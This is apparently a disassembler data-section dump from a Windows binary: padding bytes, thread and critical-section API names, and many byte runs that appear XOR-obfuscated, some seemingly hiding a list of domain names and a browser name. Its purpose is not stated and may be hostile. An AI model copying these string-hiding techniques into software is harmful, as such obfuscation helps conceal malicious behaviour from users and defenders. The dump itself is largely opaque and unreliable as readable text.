db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 0BFh, 13h, 0
db 10h
db 0C7h, 13h, 0
db 10h
db 0Dh, 14h, 0
db 10h
db 4Bh, 14h, 0
db 10h
aCreatethread_1 db 'CreateThread',0
aEntercritica_0 db 'EnterCriticalSection',0
aInitializecr_0 db 'InitializeCriticalSection',0
aLeavecritica_0 db 'LeaveCriticalSection',0
align 4
db 0
db 5, 0, 0D4h
db 0FAh ;
aA db '',0
dw 4
db 0F2h ;
aUb db 'ܜ',0
dw 1
db 9Ch ;
db 0C0h, 0, 12h
db 0
db 8Fh, 0DCh, 0E9h
db 0ECh ;
db 0C6h, 0FCh, 0C9h
db 0E6h ;
db 0E3h, 0EAh, 0DFh
db 0FDh ;
db 0E0h, 0FBh, 0EAh
db 0ECh ;
db 0FBh, 0EAh, 0EBh
db 0
db 7, 0, 8Bh
db 0F8h ;
aAseqcc db '',0
db 7,0
aVM db '',0
db 4
db 0
aS? db 'S}=? ',0
db 1
db 0
db 0CBh, 97h, 0
db 4
align 2
aQt_c db 'qT_C)',0
db 1
align 2
dw 89ACh
db 0
db 2, 0, 65h
db 40h ; @
db 6, 0, 1
db 0
db 4Ch, 6Fh, 0
db 1
align 2
dw 0F3D0h
db 0
db 1, 0, 0FAh
db 0D9h ;
align 2
dw 7
aSixxs db 'ቕ',0
db 1, 0, 0BCh
db 9Fh ;
align 2
dw 7
aC773yll db 'C+773yll',0
db 2Bh, 4, 96h
db 0F5h ;
db 0FEh, 0F3h, 0F5h
db 0FEh ;
db 0F3h, 0F8h, 0E6h
db 0E4h ;
db 0F3h, 2 dup(0E5h)
db 0B8h ;
db 0FFh, 0F8h, 0F0h
db 0F9h ;
db 0B5h, 0F1h, 0F9h
db 0FAh ;
db 0F2h, 0E6h, 0F9h
db 0FAh ;
db 0FAh, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0FFh
db 0F8h ;
db 0E2h, 0F1h, 0F9h
db 0FAh ;
db 0F2h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0F5h
db 0F4h ;
db 0E4h, 0B8h, 0E4h
db 0E3h ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E5h, 0F9h
db 0F5h ;
db 0FDh, 0E5h, 0B8h
db 0F7h ;
db 0F5h, 0B5h, 0E5h
db 0E2h ;
db 0F9h, 0E4h, 0FBh
db 0E6h ;
db 0F7h, 0EFh, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0F5h ;
db 0E4h, 0E3h, 0E2h
db 0F9h ;
db 0E6h, 0B8h, 0F8h
db 0E3h ;
db 0B5h, 0F8h, 0F3h
db 0E1h ;
db 0B8h, 0F3h, 0F1h
db 0F1h ;
db 0B8h, 0F5h, 0F9h
db 0FBh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E6h, 0F9h
db 0F8h ;
db 0ECh, 0FFh, 0E5h
db 0F5h ;
db 0F7h, 0FBh, 0E5h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 0E1h, 0F3h, 0FAh
db 0F5h ;
db 0F9h, 0FBh, 0F3h
db 0A5h ;
db 0B8h, 0E5h, 0FBh
db 0FFh
db 0FAh, 0F3h, 0B8h
db 0F5h ;
db 0F9h, 0B8h, 0E3h
db 0FDh ;
db 0B5h, 0F9h, 0FAh
db 0F4h ;
db 0A4h, 0B8h, 0F8h
db 0F7h ;
db 0E2h, 0FFh, 0F9h
db 0F8h ;
db 0F3h, 0E2h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0F4h ;
db 0F4h, 0FFh, 0F8h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0FBh ;
db 0F7h, 0E5h, 0E2h
db 0F3h ;
db 0E4h, 0BBh, 0EEh
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0E6h, 0F9h, 0F8h
db 0ECh ;
db 0FFh, 0E5h, 0F5h
db 0F7h ;
db 0FBh, 0E5h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0BBh ;
db 0F4h, 0F7h, 0F8h
db 0E7h ;
db 0E3h, 0F3h, 0BBh
db 0F5h ;
db 0F7h, 0F8h, 0F7h
db 0F2h ;
db 0F7h, 0B8h, 0F5h
db 0F7h ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E6h, 0F9h
db 0F8h ;
db 0ECh, 0FFh, 0E5h
db 0F5h ;
db 0F7h, 0FBh, 0E5h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0F4h, 0FBh, 0F9h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 0E6h, 0F7h, 0EFh
db 0E6h ;
db 0F7h, 0FAh, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0F3h ;
db 0F4h, 0F7h, 0EFh
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0F9h, 0F0h, 0FBh
db 0F7h ;
db 0F2h, 0E3h, 0E4h
db 0F7h ;
db 0B8h, 0F5h, 0F9h
db 0FBh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0F5h, 0FFh
db 0F4h ;
db 0F5h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0E0h
db 0E2h ;
db 0F4h, 0B8h, 0E4h
db 0E3h ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0F5h, 0E1h
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 0F1h, 0F9h, 0FAh
db 0F2h ;
db 0E6h, 0F9h, 0FAh
db 0FAh ;
db 0B8h, 0F5h, 0F9h
db 0FBh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E6h, 0F9h
db 0F8h ;
db 0ECh, 0FFh, 0E5h
db 0F5h ;
db 0F7h, 0FBh, 0E5h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 2 dup(0FBh), 0F4h
db 0F7h ;
db 0F8h, 0FDh, 0B8h
db 0E4h ;
db 0E3h, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0E3h
db 0F8h ;
db 0FFh, 0F7h, 0E5h
db 0E2h ;
db 0E4h, 0E3h, 0FBh
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0F1h ;
db 0F9h, 0FAh, 0F2h
db 0E6h ;
db 0F9h, 2 dup(0FAh)
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0E6h, 0F9h, 0F8h
db 0ECh ;
db 0FFh, 0E5h, 0F5h
db 0F7h ;
db 0FBh, 0E5h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0E1h ;
db 0F9h, 0E4h, 0FAh
db 0F2h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0B8h, 0F9h, 0E4h
db 0F1h ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0F5h, 0F7h
db 0F8h ;
db 0F2h, 0FFh, 0F2h
db 0F7h ;
db 0E2h, 0F3h, 0E0h
db 0F3h ;
db 0E4h, 0FFh, 0F0h
db 0FFh
db 0F3h, 0E4h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0E6h ;
db 0F9h, 0F8h, 0ECh
db 0FFh
db 0E5h, 0F5h, 0F7h
db 0FBh ;
db 0E5h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0F4h
db 0F7h ;
db 0F8h, 0FDh, 0F9h
db 0F0h ;
db 0FFh, 0F8h, 0F2h
db 0FFh
db 0F7h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0FFh
db 0F5h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0B8h, 0E4h, 0E3h
db 0B5h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0FFh, 0F8h, 0F1h
db 0B8h ;
db 0FEh, 0F7h, 0FAh
db 0FFh
db 0F0h, 0F7h, 0EEh
db 0BBh ;
db 0F9h, 0F8h, 0FAh
db 0FFh
db 0F8h, 0F3h, 0B8h
db 0F5h ;
db 0F9h, 0B8h, 0E3h
db 0FDh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E0h, 0F3h
db 0F8h ;
db 0F2h, 0F9h, 0E4h
db 0E5h ;
db 0F8h, 0F7h, 0FBh
db 0F3h ;
db 0B8h, 0E1h, 0E5h
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0FDh, 0FBh, 0F4h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0F8h ;
db 0F3h, 0E2h, 0FBh
db 0F7h ;
db 0F1h, 0FFh, 0E5h
db 0E2h ;
db 0F3h, 0E4h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0FDh ;
db 0F7h, 0E0h, 0FDh
db 0F7h ;
db 0ECh, 0F5h, 0F3h
db 0F8h ;
db 0E2h, 0F3h, 0E4h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0E0h, 0F3h, 0F8h
db 0F2h ;
db 0F9h, 0E4h, 0E5h
db 0F8h ;
db 0F7h, 0FBh, 0F3h
db 0B8h ;
db 0E1h, 0E5h, 0B5h
db 0FBh ;
db 0EFh, 0F9h, 0F8h
db 0FAh ;
db 0FFh, 0F8h, 0F3h
db 0F7h ;
db 2 dup(0F5h), 0F9h
db 0E3h ;
db 0F8h, 0E2h, 0E5h
db 0A4h ;
db 0B8h, 0F7h, 0F4h
db 0F4h ;
db 0F3h, 0EFh, 0F8h
db 0F7h ;
db 0E2h, 0FFh, 0F9h
db 0F8h ;
db 0F7h, 0FAh, 0B8h
db 0F5h ;
db 0F9h, 0B8h, 0E3h
db 0FDh ;
db 0B5h, 0F9h, 0F8h
db 0FAh ;
db 0FFh, 0F8h, 0F3h
db 0BBh ;
db 0F4h, 0E3h, 0E5h
db 0FFh
db 0F8h, 0F3h, 0E5h
db 0E5h ;
db 0B8h, 2 dup(0FAh)
db 0F9h ;
db 0EFh, 0F2h, 0E5h
db 0E2h ;
db 0E5h, 0F4h, 0B8h
db 0F5h ;
db 0F9h, 0B8h, 0E3h
db 0FDh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0F7h, 0FAh
db 0FAh ;
db 0F7h, 0FEh, 0F7h
db 0F4h ;
db 0F7h, 0F2h, 0F4h
db 0F7h ;
db 0F8h, 0FDh, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0E4h ;
db 0F4h, 0F5h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0E6h ;
db 0F9h, 0F8h, 0ECh
db 0FFh
db 0E5h, 0F5h, 0F7h
db 0FBh ;
db 0E5h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0A7h, 0B8h
db 0FEh ;
db 0E5h, 0F4h, 0F5h
db 0B8h ;
db 0F5h, 0F7h, 0B5h
db 0FDh ;
db 0F1h, 0F4h, 0E4h
db 0F3h ;
db 0FAh, 0F7h, 0EEh
db 0F5h ;
db 0FAh, 0E3h, 0F4h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0EFh ;
db 0F7h, 0FBh, 0F4h
db 0F9h ;
db 0B8h, 0F4h, 0FFh
db 0ECh ;
db 0B5h, 0FDh, 0FFh
db 0F2h ;
db 0F9h, 0E5h, 0BBh
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0FAh ;
db 0F4h, 0F5h, 0F2h
db 0FFh
db 0E4h, 0F3h, 0F5h
db 0E2h ;
db 0B8h, 0FAh, 0F7h
db 0E3h ;
db 0E4h, 0F3h, 0F8h
db 0E2h ;
db 0FFh, 0F7h, 0F8h
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0B8h ;
db 0F5h, 0F7h, 0B5h
db 0F4h ;
db 0F7h, 0E4h, 0F5h
db 0FAh ;
db 0F7h, 0EFh, 0E5h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 0E2h, 0F9h, 0E2h
db 0F7h ;
db 2 dup(0FAh), 0EFh
db 0F0h ;
db 0E4h, 2 dup(0F3h)
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0FFh
db 0F8h, 0F1h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0F8h ;
db 0F4h, 0F5h, 0B8h
db 0F5h ;
db 0F7h, 0B5h, 0A3h
db 0A5h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0B8h, 0F5h, 0F9h
db 0FBh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E0h, 0F3h
db 0F8h ;
db 0F2h, 0F9h, 0E4h
db 0E5h ;
db 0F8h, 0F7h, 0FBh
db 0F3h ;
db 0B8h, 0E1h, 0E5h
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0F4h, 0A4h, 0F4h
db 0BBh ;
db 0E2h, 0E4h, 0E3h
db 0E5h ;
db 0E2h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0E0h
db 0F3h ;
db 0F8h, 0F2h, 0F9h
db 0E4h ;
db 0E5h, 0F8h, 0F7h
db 0FBh ;
db 0F3h, 0B8h, 0E1h
db 0E5h ;
db 0B5h, 0F9h, 0E6h
db 0F3h ;
db 0F8h, 0F4h, 0F7h
db 0F8h ;
db 0FDh, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E2h
db 0F7h ;
db 0E2h, 0BBh, 0F8h
db 0F3h ;
db 0F0h, 0E2h, 0F4h
db 0F7h ;
db 0F8h, 0FDh, 0B8h
db 0E4h ;
db 0E3h, 0B5h, 0E5h
db 0F3h ;
db 0F5h, 0FAh, 0F7h
db 0F4h ;
db 0B8h, 0E4h, 0E3h
db 0B5h ;
db 0E5h, 0F3h, 0F5h
db 0E3h ;
db 0E4h, 0FFh, 0E2h
db 0EFh ;
db 0FAh, 0F7h, 0F4h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0F0h ;
db 0F3h, 0E2h, 0FEh
db 0F7h ;
db 0E4h, 0F2h, 0B8h
db 0F4h ;
db 0FFh, 0ECh, 0B5h
db 0F1h ;
db 0E4h, 0F9h, 0F8h
db 0EEh ;
db 0E6h, 0FAh, 0F7h
db 0F8h ;
db 0F3h, 0E2h, 0E5h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0E0h ;
db 0F3h, 0F8h, 0F2h
db 0F9h ;
db 0E4h, 0E5h, 0F8h
db 0F7h ;
db 0FBh, 0F3h, 0B8h
db 0E1h ;
db 0E5h, 0B5h, 0
db 0
db 4, 2 dup(0)
db 0
db 0B2h, 0, 0F0h
db 0
db 0FDh, 0, 0F6h
db 0
db 0EBh, 2 dup(0)
db 0
db 1, 0, 1Eh
db 3Eh ; >
align 4
db 15h
align 2
dw 13h
db 47h ; G
db 12h, 29h, 26h
aG3G235_ db '%+"g3(g&23/(5.="',0
a5 db '5',0
db 0F7h
aVscxitGsCvgqse db '׃זקקה',0
dw 1
db 0A3h ;
db 8Eh, 0, 1Eh
db 0
db 0Ch, 5Ch, 60h
db 69h ; i
db 6Dh, 7Fh, 69h
db 20h
db 2Ch, 7Fh, 69h
aIoxItEMxecbUim db '`iox,It|e~mxecb,Uim~',0
db 1, 0, 30h
db 10h
align 2
dw 1Fh
db 9Ah ;
db 0CAh, 0F6h, 0FFh
db 0FBh ;
db 0E9h, 0FFh, 0B6h
db 0BAh ;
db 0E9h, 0FFh, 0F6h
db 0FFh
db 0F9h, 0EEh, 0BAh
db 0DFh ;
db 0E2h, 0EAh, 0F3h
db 0E8h ;
db 0FBh, 0EEh, 0F3h
db 0F5h ;
db 0F4h, 0BAh, 0D7h
db 0F5h ;
db 0F4h, 0EEh, 0F2h
db 0
db 4, 0, 52h
aWbj db 'wbj',0Ah,0
db 1, 0, 10h
db 4Ch ; L
align 2
dw 1
db 0F8h ;
db 0D2h, 0, 4
db 0
db ')-)))',0
db 9,0
db 60h, 30h, 12h
db 0Fh
db 4, 15h, 3
db 14h
db 29h, 4, 0
db 29h ; )
align 2
aAXzdtbcpuBAZpd db 'Ӏ',0
db 1, 0, 5Bh
db 75h ; u
align 2
dw 4
aEh@K db 'eH@=K',0
dw 3
aLs db '',0
db 8,0
aCC db '',0
db 2, 0, 2Fh
db 61h ; a
db 7Bh, 0, 2
db 0
db 0DEh, 0E7h, 86h
db 0
db 6, 0, 15h
aFagvel db 'fagvel',0
db 8,0
db '',0
db 7,0
db 87h, 0F4h, 0F7h
db 0F5h ;
db 0EEh, 0E9h, 0F3h
db 0E1h ;
align 2
dw 6
db '',0
db 5
align 2
dw 681Bh
db 69h ; i
db 7Ah, 75h, 7Fh
db 0
db 4, 0, 0C0h
aBod db '',0
db 6, 0, 10h
aUCud db '}u}cud',0
db 6
db 0
a4yqywdm db '4YQYWDM',0
db 6, 0, 93h
db 0FEh ;
db 0F6h, 0FEh, 0F0h
db 0FEh ;
db 0E3h, 0, 6
db 0
db 74h, 19h, 15h
db 18h
db 18h, 1Bh, 17h
db 0
db 4, 0, 0CDh
aLIi db '',0
db 4, 0, 0C2h
aGNl db '',0
db 7,0
aXskrxxac db '告',0
db 6
align 2
dw 4B14h
aGxqqd db 'gxqqd',0
db 0Ah,0
db 0Eh
aMZjbbJbb db 'm|zjbb jbb',0
db 0Ah,0
aTbrcjooJoo db '⁐̆',0
dw 6
aKkqVx db ' KKQ',0Dh,'VX',0
db 6
align 2
dw 66Dh
db 6
db 1Ch, 40h, 1Bh
db 15h
align 2
dw 6
aIiU db 'è',0
db 6
align 2
dw 771Ch
aWm1jd db 'wm1jd',0
db 8,0
db 7
db 22h, 74h, 58h
db 6Ah ; j
db 73h, 7Fh, 22h
db 72h ; r
align 2
dw 6
db 0D0h ;
db 2 dup(0BBh), 0A1h
db 0FDh ;
db 0A6h, 0A8h, 0
db 7
align 2
dw 0E9CCh
db 0BFh ;
db 93h, 0A1h, 0B8h
db 0B4h ;
db 0FDh, 0, 16h
db 0
aTbolbiNmbzNBnm db '⡎¶¡',0
db 6, 0, 38h
aZmllwv db 'zmllwv',0
db 1Eh
db 0
db 4, 41h, 5Ch
db 54h ; T
db 4Dh, 56h, 45h
db 50h ; P
db 4Dh, 4Bh, 4Ah
db 24h ; $
db 40h, 45h, 50h
db 41h ; A
db 3 dup(0Eh)
aEpiTmjGk@a db 'EPI$TMJ$GK@A',0
db 6, 0, 0Bh
aX_j_bh db 'X_J_BH',0
align 4
db 0
db '',0
db 4
db 0
aIcl db 'ߚ',0
db 6
db 0
db 0C5h, 0F7h, 0F5h
db 0E0h ;
db 0EBh, 0F7h, 0B0h
db 0
db 4, 0, 85h
db 0A0h ;
db 0ABh, 0B7h, 0F0h
db 0
db 2 dup(0), 0B4h
db 0
db 8, 0, 55h
db 16h
db 1Ah, 18h, 17h
db 1Ah
db 17h, 1Ah, 0Dh
db 0
db 2 dup(0), 8Eh
db 0
db 8, 0, 19h
aZvtVVa db 'ZVT[V[VA',0
db 6, 0, 12h
aAfsfQ db 'AFSF[Q',0
aN db 'n',0
db 43h, 16h, 2Dh
db 22h ; "
db 21h, 2Fh, 26h
db 63h ; c
db 37h, 2Ch, 63h
db 22h ; "
db 36h, 37h, 2Bh
db 2Ch ; ,
db 31h, 2Ah, 39h
db 26h ; &
db 6Dh, 49h, 66h
db 30h ; 0
db 63h, 33h, 31h
db 2Ch ; ,
db 20h, 26h, 30h
db 30h ; 0
db 2Ah, 2Dh, 24h
db 63h ; c
db 20h, 26h, 2Dh
db 37h ; 7
db 26h, 31h, 63h
db 2Ah ; *
db 30h, 63h, 36h
db 2Dh ; -
db 22h, 21h, 2Fh
db 26h ; &
db 63h, 37h, 2Ch
db 63h ; c
db 22h, 36h, 37h
db 2Bh ; +
db 2Ch, 31h, 2Ah
db 39h ; 9
db 26h, 63h, 3Ah
db 2Ch ; ,
db 36h, 31h, 63h
db 20h
db 22h, 31h, 27h
db 63h ; c
db 66h, 30h, 6Dh
db 49h ; I
db 0Eh, 22h, 28h
aC1170cC71CM db '&c ,11& 7*,-0c"-',27h,'c71:c"$"*-m',0
db 0Ah,0
aM db 'M',0
db 2Ch, 3Eh, 39h
db 28h ; (
db 3Fh, 0Eh, 2Ch
db 3Fh ; ?
db 29h, 0, 4
db 0
db 5Dh, 0Bh, 14h
db 0Eh
db 1Ch, 0, 1
db 0
db 42h, 62h, 0
db 6
align 2
aY80 db 'y*-8-0:',0
align 4
aT db '',0
dw 6
aV7?5 db 'v%"7"?5',0
db 15h
align 2
aFlfff6455F db 'flFFF64)%#55/(!F ',27h,'/*#"',0
db 6, 0, 5Eh
db 0Dh
db 0Ah, 1Fh, 0Ah
db 17h
db 1Dh, 0, 6
db 0
aB3o4 db 'B))3o4:',0
db 8,0
aIAgI db '̉',0
db 9,0
db 80h
db 0C4h ;
db 0EFh, 0E3h, 0CFh
db 0E2h ;
db 0EAh, 0E5h, 0E3h
db 0F4h ;
align 2
dw 0Eh
aAGGcZz db 'Ԁ',0
db 4
align 2
dw 0B49Ah
db 0F4h ;
db 0F6h, 0E9h, 0
db 1
align 2
dw 0FBA7h
db 0
db 5, 0, 3
aPP_ db '&p&p_',0
dw 5
db 2Bh ; +
db 0Eh, 58h, 0Eh
db 58h ; X
db 77h, 0, 3
db 0
aUA db '',0
dw 4
aPk db '',0
align 10h
db 0
db 9,0
align 4
db 0
db '',0
aZ db '',0
aA_0 db '',0
aG db '',0
aK db '',0
db '',0
aA_1 db '',0
aA_2 db '',0
db '',0
aB db '',0
db 2 dup(0), 5Fh
db 0
aIu_iTyi_TyiTyi db 'Iu $.i> -=!tyi!, .!=tyi+&;-,;tyi:;*t!==9sffl:v!tl:o tl<l:o&tl<o/t'
db 'l*o: tl:o:&tl<o=%tl<o?tl<o-tl:w',0
db ',',0
aBAAnaAnaAnaAsT db 'ڝՀɀπހΒۀރ',0
db 7,0
aNPnuP db 'ӏӏ',0
db 3, 0, 7Ah
dd 471541h, 7B400004h, 7D2F33h, 0F3C80004h, 0E2F5ACh, 300h
dd 0F004600h, 1000B00h, 10000000h, 0F9E2B100h, 0F7C5D4F6h
dd 0D4D5DDDEh, 0C5D0E1C3h, 0B00F0D9h, 0C4DFAC00h, 9FC0C0C9h
dd 0C0C8829Eh, 0B00C0h, 6B667D0Eh, 3C3D6262h, 62626A20h
dd 2000C00h, 57766745h, 4C706771h, 43676F63h, 0B000B00h
dd 486C6E59h, 6E786467h, 726E40h, 0BDEF0010h, 9ABE888Ah
dd 0B9969D8Ah, 8A9A838Eh, 0AE97AAh, 0C99B000Dh, 0EBD4FCFEh
dd 0FED0F5FEh, 0DAE3DEE2h, 7000C00h, 66716366h, 35346E77h
dd 6B6B6329h, 8E000C00h, 0EFF8EAEFh, 0BCBDE7FEh, 0E2E2EAA0h
dd 97000100h, 500CBh, 331C4A6Fh, 5001C4Ah, 0C5A7F00h, 0C5A23h
dd 0AE8B0004h, 0A1D7F8h, 0D8F60004h, 859A98h, 79250001h
dd 0C001100h
aEbxiBixItCI db 'Ebxi~bix,It|`c~i~',0
align 4
aD db 'D',0
dw 1
dd 2D55h, 0E00E400h, 0DBF9BE00h, 0D1CAEDCAh, 0DCF1D5DDh
